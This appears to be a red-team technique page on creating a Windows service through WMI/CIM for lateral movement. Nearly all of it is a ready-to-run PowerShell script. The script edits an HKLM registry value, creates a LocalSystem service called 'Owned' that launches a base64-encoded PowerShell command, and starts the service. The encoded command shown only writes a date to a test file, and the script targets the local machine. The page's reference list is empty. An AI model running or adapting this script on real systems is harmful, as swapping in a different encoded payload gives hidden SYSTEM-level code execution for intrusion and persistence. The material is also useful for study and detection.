WMI service creation

This code creates a new service that executes a malicious command for lateral movement between hosts.

Invoke-CimMethod -Namespace root/default -ClassName StdregProv -MethodName SetStringValue -Arguments @{
	hDefKey = [UInt32] 2147483650 # HKLM
	sSubKeyName = 'SYSTEM\CurrentControlSet\Control'
	sValueName = 'WaitToKillServiceTimeout'
	sValue = '120000'
}
 
Invoke-CimMethod -ClassName Win32_Service -MethodName Create -Arguments @{
	StartMode = 'Manual'
	StartName = 'LocalSystem'
	ServiceType = ([Byte] 16)
	ErrorControl = ([Byte] 1)
	Name = 'Owned'
	DisplayName = 'Owned'
	DesktopInteract  = $False
	PathName = "cmd /c $Env:windir\System32\WindowsPowerShell\v1.0\powershell.exe -EncodedCommand RwBlAHQALQBEAGEAdABlACAAfAAgAE8AdQB0AC0ARgBpAGwAZQAgAEMAOgBcAFQAZQBzAHQAXABvAHcAbgBlAGQALgB0AHgAdAAgAC0AQQBwAHAAZQBuAGQA -NonInteractive -NoProfile"
}
 
$EvilService = Get-CimInstance -ClassName Win32_Service -Filter 'Name = "Owned"'	
Invoke-CimMethod -MethodName StartService -InputObject $EvilService
#Invoke-CimMethod -MethodName Delete -InputObject $EvilService

References:

Last updated